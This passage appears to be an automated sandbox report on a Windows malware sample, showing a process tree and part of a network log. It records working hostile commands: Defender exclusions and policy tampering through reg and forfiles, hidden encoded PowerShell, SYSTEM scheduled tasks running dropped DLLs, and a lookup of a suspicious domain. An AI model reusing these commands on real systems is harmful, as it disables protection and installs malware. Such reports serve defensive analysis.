                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\olrZuEJhuzUWbFuCi" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • Windows security bypass
                                              PID:1600
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              PID:1612
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • Windows security bypass
                                              PID:1720
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BnSeAqsvAhUdC" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                                PID:2684
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BnSeAqsvAhUdC" /t REG_DWORD /d 0 /reg:64
                                                4⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:1980
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MivewcCGXeCU2" /t REG_DWORD /d 0 /reg:32
                                                4⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:2036
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MivewcCGXeCU2" /t REG_DWORD /d 0 /reg:64
                                                4⤵
                                                  PID:2556
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TusZhOGSSwUn" /t REG_DWORD /d 0 /reg:32
                                                  4⤵
                                                    PID:2300
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TusZhOGSSwUn" /t REG_DWORD /d 0 /reg:64
                                                    4⤵
                                                      PID:2460
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZIWhWpltLlQHHUslkTR" /t REG_DWORD /d 0 /reg:32
                                                      4⤵
                                                        PID:2752
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZIWhWpltLlQHHUslkTR" /t REG_DWORD /d 0 /reg:64
                                                        4⤵
                                                          PID:2816
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rksWaXujU" /t REG_DWORD /d 0 /reg:32
                                                          4⤵
                                                            PID:996
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rksWaXujU" /t REG_DWORD /d 0 /reg:64
                                                            4⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:2196
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\BiTaXhratCGNPnVB" /t REG_DWORD /d 0 /reg:32
                                                            4⤵
                                                              PID:2876
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\BiTaXhratCGNPnVB" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                                PID:2492
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                4⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:2668
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                4⤵
                                                                  PID:2616
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\olrZuEJhuzUWbFuCi" /t REG_DWORD /d 0 /reg:32
                                                                  4⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:3020
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\olrZuEJhuzUWbFuCi" /t REG_DWORD /d 0 /reg:64
                                                                  4⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:1524
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:32
                                                                  4⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:2912
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:64
                                                                  4⤵
                                                                    PID:2688
                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                  schtasks /CREATE /TN "gbfUGSHgt" /SC once /ST 03:04:13 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                  3⤵
                                                                  • Scheduled Task/Job: Scheduled Task
                                                                  PID:3024
                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                  schtasks /run /I /tn "gbfUGSHgt"
                                                                  3⤵
                                                                    PID:2788
                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                    schtasks /DELETE /F /TN "gbfUGSHgt"
                                                                    3⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:1692
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                    3⤵
                                                                      PID:2076
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                        4⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:1672
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                      3⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:2128
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                        4⤵
                                                                          PID:1728
                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                        schtasks /CREATE /TN "mVwrlHrSDNRLOGqZG" /SC once /ST 03:13:12 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ErKIoDgHiflivqkZ\WnSrIDIgFqFuSvw\gLYDEcB.exe\" uL /NafCdidyF 525403 /S" /V1 /F
                                                                        3⤵
                                                                        • Drops file in Windows directory
                                                                        • Scheduled Task/Job: Scheduled Task
                                                                        PID:448
                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                        schtasks /run /I /tn "mVwrlHrSDNRLOGqZG"
                                                                        3⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:2580
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2068 -s 628
                                                                        3⤵
                                                                        • Loads dropped DLL
                                                                        • Program crash
                                                                        PID:1148
                                                                    • C:\Windows\Temp\ErKIoDgHiflivqkZ\WnSrIDIgFqFuSvw\gLYDEcB.exe
                                                                      C:\Windows\Temp\ErKIoDgHiflivqkZ\WnSrIDIgFqFuSvw\gLYDEcB.exe uL /NafCdidyF 525403 /S
                                                                      2⤵
                                                                      • Checks computer location settings
                                                                      • Executes dropped EXE
                                                                      • Drops Chrome extension
                                                                      • Drops file in System32 directory
                                                                      • Drops file in Program Files directory
                                                                      • System Location Discovery: System Language Discovery
                                                                      • Modifies data under HKEY_USERS
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      PID:612
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                        3⤵
                                                                          PID:1764
                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                            4⤵
                                                                            • Indirect Command Execution
                                                                            PID:1560
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                              5⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:1596
                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                6⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:1792
                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                            forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                            4⤵
                                                                            • Indirect Command Execution
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:804
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                              5⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:908
                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                6⤵
                                                                                  PID:604
                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                              4⤵
                                                                              • Indirect Command Execution
                                                                              PID:2996
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                5⤵
                                                                                  PID:1948
                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                    6⤵
                                                                                      PID:1788
                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                  forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                  4⤵
                                                                                  • Indirect Command Execution
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:684
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                    5⤵
                                                                                      PID:2516
                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                        6⤵
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:2384
                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                    4⤵
                                                                                    • Indirect Command Execution
                                                                                    PID:2256
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                      5⤵
                                                                                        PID:2140
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                          6⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Drops file in System32 directory
                                                                                          • Modifies data under HKEY_USERS
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:2136
                                                                                          • C:\Windows\SysWOW64\gpupdate.exe
                                                                                            "C:\Windows\system32\gpupdate.exe" /force
                                                                                            7⤵
                                                                                              PID:1068
                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                      schtasks /DELETE /F /TN "bWNXgrRlacKgnUwPKK"
                                                                                      3⤵
                                                                                        PID:932
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
                                                                                        3⤵
                                                                                          PID:1616
                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                            forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                            4⤵
                                                                                            • Indirect Command Execution
                                                                                            PID:2748
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                              5⤵
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:1156
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                6⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                • Drops file in System32 directory
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:2088
                                                                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                  "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                  7⤵
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:1276
                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                            forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"
                                                                                            4⤵
                                                                                            • Indirect Command Execution
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:848
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                              5⤵
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:2244
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                6⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                • Drops file in System32 directory
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:2204
                                                                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                  "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                  7⤵
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:2216
                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                          schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\rksWaXujU\EFzTpY.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "AlVsOicJKGYGSUS" /V1 /F
                                                                                          3⤵
                                                                                          • Drops file in Windows directory
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                          PID:2188
                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                          schtasks /CREATE /TN "AlVsOicJKGYGSUS2" /F /xml "C:\Program Files (x86)\rksWaXujU\dgpWayZ.xml" /RU "SYSTEM"
                                                                                          3⤵
                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                          PID:2672
                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                          schtasks /END /TN "AlVsOicJKGYGSUS"
                                                                                          3⤵
                                                                                            PID:1780
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            schtasks /DELETE /F /TN "AlVsOicJKGYGSUS"
                                                                                            3⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:1784
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            schtasks /CREATE /TN "HqaqbRPcNxJZrD" /F /xml "C:\Program Files (x86)\MivewcCGXeCU2\pfpSGyE.xml" /RU "SYSTEM"
                                                                                            3⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                            PID:1860
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            schtasks /CREATE /TN "KtgLbJTNbqQVX2" /F /xml "C:\ProgramData\BiTaXhratCGNPnVB\OqlCPyB.xml" /RU "SYSTEM"
                                                                                            3⤵
                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                            PID:1932
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            schtasks /CREATE /TN "CaeXOOsQHbNfKhlUh2" /F /xml "C:\Program Files (x86)\ZIWhWpltLlQHHUslkTR\izElhPb.xml" /RU "SYSTEM"
                                                                                            3⤵
                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                            PID:2404
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            schtasks /CREATE /TN "eUzrIsCcCKtUEuKCBuS2" /F /xml "C:\Program Files (x86)\BnSeAqsvAhUdC\nYKHVyW.xml" /RU "SYSTEM"
                                                                                            3⤵
                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                            PID:1972
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            schtasks /CREATE /TN "KOXGBKFkHUHlhNtav" /SC once /ST 00:23:17 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\ErKIoDgHiflivqkZ\dCdkihji\aMTozzm.dll\",#1 /aNdidF 525403" /V1 /F
                                                                                            3⤵
                                                                                            • Drops file in Windows directory
                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                            PID:1980
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            schtasks /run /I /tn "KOXGBKFkHUHlhNtav"
                                                                                            3⤵
                                                                                              PID:2040
                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                              schtasks /DELETE /F /TN "mVwrlHrSDNRLOGqZG"
                                                                                              3⤵
                                                                                                PID:2440
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 612 -s 1540
                                                                                                3⤵
                                                                                                • Loads dropped DLL
                                                                                                • Program crash
                                                                                                PID:2028
                                                                                            • C:\Windows\system32\rundll32.EXE
                                                                                              C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ErKIoDgHiflivqkZ\dCdkihji\aMTozzm.dll",#1 /aNdidF 525403
                                                                                              2⤵
                                                                                                PID:2288
                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                  C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ErKIoDgHiflivqkZ\dCdkihji\aMTozzm.dll",#1 /aNdidF 525403
                                                                                                  3⤵
                                                                                                  • Blocklisted process makes network request
                                                                                                  • Checks BIOS information in registry
                                                                                                  • Loads dropped DLL
                                                                                                  • Drops file in System32 directory
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  • Enumerates system info in registry
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  PID:2704
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks /DELETE /F /TN "KOXGBKFkHUHlhNtav"
                                                                                                    4⤵
                                                                                                      PID:2668
                                                                                              • C:\Windows\system32\taskeng.exe
                                                                                                taskeng.exe {A9D37EFA-5736-4263-8B18-5CF7CD4EAAC9} S-1-5-21-3434294380-2554721341-1919518612-1000:ELZYPTFV\Admin:Interactive:[1]
                                                                                                1⤵
                                                                                                  PID:2356
                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                    2⤵
                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                    • Drops file in System32 directory
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:2396
                                                                                                    • C:\Windows\system32\gpupdate.exe
                                                                                                      "C:\Windows\system32\gpupdate.exe" /force
                                                                                                      3⤵
                                                                                                        PID:1804
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                      2⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Drops file in System32 directory
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:2276
                                                                                                      • C:\Windows\system32\gpupdate.exe
                                                                                                        "C:\Windows\system32\gpupdate.exe" /force
                                                                                                        3⤵
                                                                                                          PID:2736
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                        2⤵
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        • Drops file in System32 directory
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:1628
                                                                                                        • C:\Windows\system32\gpupdate.exe
                                                                                                          "C:\Windows\system32\gpupdate.exe" /force
                                                                                                          3⤵
                                                                                                            PID:3052
                                                                                                      • C:\Windows\system32\gpscript.exe
                                                                                                        gpscript.exe /RefreshSystemParam
                                                                                                        1⤵
                                                                                                          PID:876
                                                                                                        • C:\Windows\system32\gpscript.exe
                                                                                                          gpscript.exe /RefreshSystemParam
                                                                                                          1⤵
                                                                                                            PID:2796
                                                                                                          • C:\Windows\system32\gpscript.exe
                                                                                                            gpscript.exe /RefreshSystemParam
                                                                                                            1⤵
                                                                                                              PID:2656

                                                                                                            Network

                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              service-domain.xyz
                                                                                                              gLYDEcB.exe
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              service-domain.xyz
                                                                                                              IN A
                                                                                                              Response
                                                                                                              service-domain.xyz
                                                                                                              IN A
                                                                                                              54.210.117.250
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              c.pki.goog
                                                                                                              gLYDEcB.exe
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              c.pki.goog
                                                                                                              IN A
                                                                                                              Response
                                                                                                              c.pki.goog
                                                                                                              IN CNAME
                                                                                                              pki-goog.l.google.com
                                                                                                              pki-goog.l.google.com
                                                                                                              IN A
                                                                                                              216.58.214.163
                                                                                                            • flag-fr
                                                                                                              GET
                                                                                                              http://c.pki.goog/r/r1.crl
                                                                                                              gLYDEcB.exe
                                                                                                              Remote address:
                                                                                                              216.58.214.163:80
                                                                                                              Request
                                                                                                              GET /r/r1.crl HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept: */*
                                                                                                              User-Agent: Microsoft-CryptoAPI/6.1
                                                                                                              Host: c.pki.goog
                                                                                                              Response
                                                                                                              HTTP/1.1 200 OK
                                                                                                              Accept-Ranges: bytes
